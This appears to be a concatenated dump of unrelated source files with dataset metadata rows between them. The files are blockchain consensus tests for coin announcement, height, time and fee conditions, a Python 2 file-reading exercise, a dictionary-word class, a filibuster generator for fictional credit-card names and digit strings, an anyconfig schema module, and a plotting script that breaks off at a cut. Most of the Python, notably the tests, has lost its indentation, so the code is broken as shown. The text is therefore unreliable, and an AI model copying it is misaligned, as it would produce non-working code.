bad_spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin, bad_dic)
valid_spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin, valid_dic)
assert bad_spend_bundle is not None
assert valid_spend_bundle is not None
# Invalid block bundle
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bad_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_MY_COIN_ID_FAILED
# Valid block bundle
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=valid_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_coin_announcement_consumed(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
block2 = blocks[3]
spend_coin_block_1 = None
spend_coin_block_2 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
for coin in list(block2.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_2 = coin
# This condition requires block2 coinbase to be spent
block1_cvp = ConditionWithArgs(
ConditionOpcode.ASSERT_COIN_ANNOUNCEMENT,
[Announcement(spend_coin_block_2.name(), b"test").name()],
)
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# This condition requires block1 coinbase to be spent
block2_cvp = ConditionWithArgs(
ConditionOpcode.CREATE_COIN_ANNOUNCEMENT,
[b"test"],
)
block2_dic = {block2_cvp.opcode: [block2_cvp]}
block2_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_2, block2_dic
)
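        # How the two conditions pair up (illustrative note, following the
        # Announcement construction above): the ASSERT_COIN_ANNOUNCEMENT in
        # block1's spend only passes when the same block also spends
        # spend_coin_block_2 with CREATE_COIN_ANNOUNCEMENT [b"test"], because
        # both sides reduce to Announcement(spend_coin_block_2.name(), b"test").name().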
# Invalid block bundle
assert block1_spend_bundle is not None
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_ANNOUNCE_CONSUMED_FAILED
# bundle_together contains both transactions
bundle_together = SpendBundle.aggregate([block1_spend_bundle, block2_spend_bundle])
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bundle_together,
guarantee_transaction_block=True,
)
# Try to validate newly created block
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_puzzle_announcement_consumed(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
block2 = blocks[3]
spend_coin_block_1 = None
spend_coin_block_2 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
for coin in list(block2.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_2 = coin
# This condition requires block2 coinbase to be spent
block1_cvp = ConditionWithArgs(
ConditionOpcode.ASSERT_PUZZLE_ANNOUNCEMENT,
[Announcement(spend_coin_block_2.puzzle_hash, b"test").name()],
)
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# This condition requires block1 coinbase to be spent
block2_cvp = ConditionWithArgs(
ConditionOpcode.CREATE_PUZZLE_ANNOUNCEMENT,
[b"test"],
)
block2_dic = {block2_cvp.opcode: [block2_cvp]}
block2_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_2, block2_dic
)
# Invalid block bundle
assert block1_spend_bundle is not None
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_ANNOUNCE_CONSUMED_FAILED
# bundle_together contains both transactions
bundle_together = SpendBundle.aggregate([block1_spend_bundle, block2_spend_bundle])
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bundle_together,
guarantee_transaction_block=True,
)
# Try to validate newly created block
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_height_absolute(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after index 10
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_HEIGHT_ABSOLUTE, [int_to_bytes(10)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block at index 10
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_HEIGHT_ABSOLUTE_FAILED
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
res, _, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
# At index 11, it can be spent
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_height_relative(self, two_nodes):
num_blocks = 11
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after index 11
        # This condition requires block1 coinbase to be spent more than 10 blocks after it was farmed
# block index has to be greater than (2 + 9 = 11)
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_HEIGHT_RELATIVE, [int_to_bytes(9)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block at index 11
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_HEIGHT_RELATIVE_FAILED
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
res, _, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
# At index 12, it can be spent
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_seconds_relative(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent 300 seconds after coin creation
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_SECONDS_RELATIVE, [int_to_bytes(300)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
        # program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
time_per_block=20,
guarantee_transaction_block=True,
)
# Try to validate that block before 300 sec
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_SECONDS_RELATIVE_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
time_per_block=301,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_seconds_absolute(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
        # This condition requires block1 coinbase to be spent at least 30 seconds from now
current_time_plus3 = uint64(blocks[-1].foliage_transaction_block.timestamp + 30)
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_SECONDS_ABSOLUTE, [int_to_bytes(current_time_plus3)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
        # program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
time_per_block=20,
guarantee_transaction_block=True,
)
# Try to validate that block before 30 sec
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_SECONDS_ABSOLUTE_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
time_per_block=31,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_fee_condition(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires fee to be 10 mojo
cvp_fee = ConditionWithArgs(ConditionOpcode.RESERVE_FEE, [int_to_bytes(10)])
# This spend bundle has 9 mojo as fee
block1_dic_bad = {cvp_fee.opcode: [cvp_fee]}
block1_dic_good = {cvp_fee.opcode: [cvp_fee]}
block1_spend_bundle_bad = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic_bad, fee=9
)
block1_spend_bundle_good = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic_good, fee=10
)
log.warning(block1_spend_bundle_good.additions())
log.warning(f"Spend bundle fees: {block1_spend_bundle_good.fees()}")
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle_bad,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.RESERVE_FEE_CONDITION_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle_good,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
| [
"[email protected]"
] | |
fe08790f0a1ce9cb7efb4031c9bbf11adbbfcec9 | 6efdee46507c2f2d05e4986c963f189a1e754e9b | /ex15.py | 048204e2129b9aea9b9230e4d635d3eca03a682d | [] | no_license | SachinPitale/Python | b0d2d08f6f12bdce8a30ba9e9c370d3415721168 | 6889527b4b04e394feedcd6516e0298cccb6c5ee | refs/heads/master | 2020-07-26T05:59:46.325528 | 2019-09-15T07:26:24 | 2019-09-15T07:26:24 | 208,557,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py |
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's your file %r :" %filename
print txt.read()
print "type the file name again "
file_again = raw_input("> ")
txt_again = open(file_again)
print txt_again.read()
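# Usage sketch (illustrative; the filename is a placeholder — any readable
# text file works):
#   python ex15.py ex15_sample.txt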
| [
"[email protected]"
] | |
689f182aaf2c3e12e5345b5f4029c3a84a26d873 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_unshakeable.py | e5580220c428d26267e79c308054751c325bd982 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py |
#calss header
class _UNSHAKEABLE():
def __init__(self,):
self.name = "UNSHAKEABLE"
self.definitions = [u"If someone's trust or belief is unshakeable, it is firm and cannot be made weaker or destroyed: "]
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
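# Usage sketch (illustrative; in practice run() is presumably invoked by the
# surrounding xai framework rather than called directly):
#   w = _UNSHAKEABLE()
#   w.run('subject', 'belief')   # -> {'belief': {'properties': 'unshakeable'}}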
| [
"[email protected]"
] | |
1fb2df762dd45f6aa9845f161da2ee0c3e55bf03 | 77f5a8d34aadc697e95671f1c9b17ca547e2b4c1 | /xierpa3/contributions/filibuster/content/creditcard.py | 3038f19db04632a24c976e6344a1a4cf9dd30217 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | dungmv56/Xierpa3 | ef9f37a62a5b739e6e41f8bbe683820771a2f22e | 1e5fecaee84204401f3cc7ccea10092cb31029bf | refs/heads/master | 2020-12-24T11:17:31.945821 | 2016-02-25T11:39:08 | 2016-02-25T11:39:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,697 | py | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# Contributed by Erik van Blokland and Jonathan Hoefler
# Original from filibuster.
#
# FILIBUSTER.ORG!
"""
living
--------------------------------------------------------------------
"""
__version__ = '3.0.0'
__author__ = "someone"
content = {
'creditcard': [
'<#p_cc_flavor#><#p_cc_sx#>',
'<#p_cc_flavor#><#p_cc_flavor#><#p_cc_sx#>',
'<#p_cc_quality#> <#p_cc_flavor#><#p_cc_sx#>',
'<#p_cc_quality#> <#p_cc_flavor#><#p_cc_sx#>',
],
'creditcard_accepted': [
'<#company#> welcomes <#creditcard#>',
'<#company#> prefers <#creditcard#>',
'We welcome <#creditcard#>',
'We prefer <#creditcard#>',
'<#creditcard#> preferred!',
'<#creditcard#> accepted.',
'Pay with <#creditcard#>',
],
'creditcard_issued': [
'<#p_cc_issuer#> <#creditcard#>',
u'<#p_cc_issuer#>’s <#creditcard#>',
'<#creditcard#>, by <#p_cc_issuer#>',
],
'creditcard_number': [
'<#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#>',
],
'creditcard_validuntil': [
'<#time_months#> <#time_comingyears#>',
],
'p_acronym': [
'<#alphabet_caps#><#alphabet_caps#>',
'<#alphabet_caps#><#alphabet_caps#><#alphabet_caps#>',
],
'p_cc_flavor': [
'<#p_cc_flavor_common#>',
'<#p_cc_flavor_nonsense#>',
'<#name_japanese#>',
'<#p_cc_flavor_religious#>',
'<#p_cc_flavor_super#>',
'<#p_cc_flavor_count#>',
'<#p_cc_flavor_sweet#>',
'<#p_cc_flavor_shop#>',
'<#p_cc_flavor_money#>',
'<#p_cc_flavor_modern#>',
'<#p_cc_flavor_currency#>',
'<#p_cc_flavor_locale#>',
'<#p_cc_flavor_odd#>',
'<#p_cc_flavor_others#>',
],
'p_cc_flavor_common': [
'Direct',
'Media',
'Uni',
'Family',
'Member',
'Diner',
],
'p_cc_flavor_count': [
'Twin',
'Bi',
'Duo',
'Tri',
'Trio',
'Quatro',
'Penta',
],
'p_cc_flavor_currency': [
'Dime',
'<#sci_transition_metals#>Dollar',
'Dollar',
'Sterling',
'Change',
],
'p_cc_flavor_locale': [
'Euro',
'Asia',
'US',
'HK',
],
'p_cc_flavor_modern': [
'Com',
'Phone',
'Smart',
'Swipe',
'Compu',
'Terminal',
'Electro',
'Plasti',
'Chem',
'Chemi',
'Chemo',
'Net',
'Web',
'SET',
'Inter',
],
'p_cc_flavor_money': [
'Buy',
'Cash',
'Kash',
'Money',
'Pecunia',
'Debet',
'Debt',
'Specu',
'Pin',
'Chipper',
],
'p_cc_flavor_nonsense': [
'Exi',
'Minto',
'Exo',
'Mondo',
'Fina',
],
'p_cc_flavor_odd': [
'Gas',
'Petro',
'Petroli',
],
'p_cc_flavor_others': [
'<#p_acronym#>',
'<#p_co_creative#>',
'<#p_co_mediaprefix#>',
'<#p_business_name#>',
'<#p_cc_quality#>',
],
'p_cc_flavor_religious': [
'Pure',
'Reli',
'Holy',
'Spiri',
'God',
'Noble',
],
'p_cc_flavor_shop': [
'Excel',
'Access',
'XS',
'Fast',
'Digi',
'E',
'Shop',
'Store',
'Market',
],
'p_cc_flavor_super': [
'Super',
'Hyper',
'Ultra',
'Kid',
'Major',
'Minor',
],
'p_cc_flavor_sweet': [
'Courtesy',
'Polite',
'Nice',
'Comfort',
'Friendly',
'Friendli',
],
'p_cc_issuer': [
'<#company#>',
'<#eurobank#>',
'<#usbank#>',
'<#name_japanese#>',
],
'p_cc_quality': [
'Personal',
'Home',
'Business',
'Corporate',
'<#sci_popularelements#>',
'<#sci_popularelements#>',
'<#sci_popularelements#>',
'<#sci_popularelements#>',
],
'p_cc_sx': [
'Card',
'Card',
'Card',
'Card',
'Credit',
'Express',
],
}
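# Illustrative expansion (assumption: filibuster resolves '<#tag#>' references
# recursively against dictionaries like the one above), e.g. 'creditcard_number'
# could render as something like '4821 9034 7712 0256'.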
| [
"[email protected]"
] | |
de8214dd5f2792bdca5eccdda107e72222c30130 | 58115fa94a81b02a8b194fe7f1c1cd4ff996df97 | /src/anyconfig/schema/__init__.py | 1437437066cf8b3c7b6580abe489d66ce4816ad7 | [
"MIT"
] | permissive | Terrance-forks/python-anyconfig | 9f77de334c162e1c2334a749c29f63bd0294a09b | 21d7c0e30287569b394972557b5a54fab03bcd5c | refs/heads/master | 2021-06-19T09:11:18.697637 | 2021-05-17T04:35:10 | 2021-05-17T04:35:10 | 202,930,334 | 0 | 0 | MIT | 2019-08-17T20:52:23 | 2019-08-17T20:52:22 | null | UTF-8 | Python | false | false | 451 | py | #
# Copyright (C) 2021 Satoru SATOH <[email protected]>
# SPDX-License-Identifier: MIT
#
r"""misc global constants, variables, classes and so on.
"""
try:
from .jsonschema import validate, is_valid, gen_schema
SUPPORTED: bool = True
except ImportError:
from .default import validate, is_valid, gen_schema
SUPPORTED = False # type: ignore
__all__ = [
'validate', 'is_valid', 'gen_schema', 'SUPPORTED'
]
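# Illustrative use (sketch; the exact return value of validate() is an
# assumption based on the jsonschema-backed implementation):
#   from anyconfig import schema
#   if schema.SUPPORTED:        # True only when jsonschema is importable
#       result = schema.validate(data, schema_object)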
# vim:sw=4:ts=4:et:
| [
"[email protected]"
] | |
89018a833caf16c361c788be55349a65e85782d1 | 30e58b930c31526a1e226a928bc77e23f232080e | /mapfunctions/plotMaker.py | e04deb5fbb17956d5e7c3e0ca08b53359a0972c8 | [] | no_license | bbw7561135/anisotropy | c8688f9d705234c6a90f607acb3e8cc28ea5be28 | a21f85788c16d8aa14fc5934f476def4c8954f34 | refs/heads/master | 2021-06-01T05:35:48.727845 | 2016-05-13T00:27:37 | 2016-05-13T00:27:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,679 | py | #!/usr/bin/env python
import subprocess, glob, math, os, argparse
import myGlobals as my
from anisotropy.icesim.analysis import readDist as readDist_IC
from anisotropy.topsim.analysis import readDist as readDist_IT
from anisotropy.mapfunctions.energyCuts import getEbins, getEnergyMaps
def medianLabel(config, emin, emax):
if config[:2] == 'IC':
median, sigL, sigR = readDist_IC(config, emin, emax)
if config[:2] == 'IT':
median, sigL, sigR = readDist_IT(config, emin, emax)
median = 10**(9+median)
median = round(median, -int(math.floor(math.log10(median))) + 1)
if median >= 1e15:
return '%.1fPeV' % (median / 1e15)
if median >= 1e12:
if median >= 1e13:
return '%iTeV' % (median / 1e12)
return '%.1fTeV' % (median / 1e12)
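# Formatting examples for medianLabel (illustrative; real medians come from the
# readDist lookups above, values shown are after the two-significant-figure
# rounding):
#   median = 2.2e12  ->  '2.2TeV'
#   median = 1.3e13  ->  '13TeV'
#   median = 1.6e15  ->  '1.6PeV'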
if __name__ == "__main__":
# Global variables setup for path names
my.setupAnisotropy(verbose=False)
mapPrefix = my.ani_maps
p = argparse.ArgumentParser(
description='Makes all plots for anisotropy paper')
p.add_argument('-b', '--batch', dest='batch',
default=False, action='store_true',
help='Option to not show interactive plots')
p.add_argument('--largesmall', dest='largesmall',
default=False, action='store_true',
help='Large and small scale structure maps for IceCube')
p.add_argument('--unsmoothed', dest='unsmoothed',
default=False, action='store_true',
help='Unsmoothed relative intensity map')
p.add_argument('--ic59', dest='ic59',
default=False, action='store_true',
help='IC59 20deg smoothed map for comparison')
p.add_argument('--it', dest='it',
default=False, action='store_true',
help='IceTop relint & sig maps')
p.add_argument('--square', dest='square',
default=False, action='store_true',
help='Square subset maps for comparison of small-scale features')
p.add_argument('--ebins', dest='ebins',
default=False, action='store_true',
help='IceCube maps binned in energy')
p.add_argument('--polar', dest='polar',
default=False, action='store_true',
help='IceCube maps binned in energy (polar view)')
p.add_argument('--powerspec', dest='powerspec',
default=False, action='store_true',
help='Power spectrum plot')
p.add_argument('--solar', dest='solar',
default=False, action='store_true',
help='Solar dipole maps')
p.add_argument('--dipole', dest='dipole',
default=False, action='store_true',
help='Plot dipole phase as a function of energy')
p.add_argument('--minima', dest='minima',
default=False, action='store_true',
help='Plot phase of absolute minimum as a function of energy')
p.add_argument('--reco', dest='reco',
default=False, action='store_true',
help='Plot table used for IC energy reconstructions')
p.add_argument('--edist', dest='edist',
default=False, action='store_true',
help='Plot true energy distributions for reco energy bins')
p.add_argument('--edist2', dest='edist2',
default=False, action='store_true',
help='Plot true energy distributions for reco energy bins')
p.add_argument('--proj', dest='proj',
default=False, action='store_true',
help='Plot 1D projection for sid + solar')
p.add_argument('--projerr', dest='projerr',
default=False, action='store_true',
help='Plot 1D projection for anti + ext')
p.add_argument('--projcomp', dest='projcomp',
default=False, action='store_true',
help='Plot 1D projection for each year')
p.add_argument('--smallscale', dest='smallscale',
default=False, action='store_true',
help='Relative intensity for each small-scale region over time')
p.add_argument('--all', dest='all',
default=False, action='store_true',
help='Make all plots')
args = p.parse_args()
opts = vars(args)
if args.all:
opts = {key:True for key in opts}
argList = []
outDir = '/home/jbourbeau/anisotropy/paperplots/'
if not os.path.isdir(outDir):
outDir = '/home/jbourbeau/'
ext = 'png'
batch = args.batch
##=========================================================================
## Skymaps
cmd = '{}/mapfunctions/plotFITS.py'.format(my.ani_home)
defArgs = '-o --mask --outDir {} --ext {}'.format(outDir, ext)
if batch:
defArgs += ' -b'
# Large- and small-scale structure
mapFile = mapPrefix + '/IC_24H_sid.fits'
#a = [mapFile+' -n relint -S 5 -s 3 -m -1.5 -M 1.5 --half']
a = [mapFile+' -n relint -S 5 -s 3 -m -1.5 -M 1.5 --half --gplane']
a += [mapFile+' -n relint -S 5 -s 4 -m -5 -M 5 --multi 2 --half --gplane']
#a += [mapFile+' -n signal -S 5 -m -45 -M 30 --half']
#a += [mapFile+' -n signal -S 5 -m -9 -M 9 --multi 2 --half']
a += [mapFile+' -n signal -S 5 -m -45 -M 45 --half --gplane']
a += [mapFile+' -n signal -S 5 -m -12 -M 12 --multi 2 --half --gplane']
if opts['largesmall']:
argList += a
# Unsmoothed relative intensity
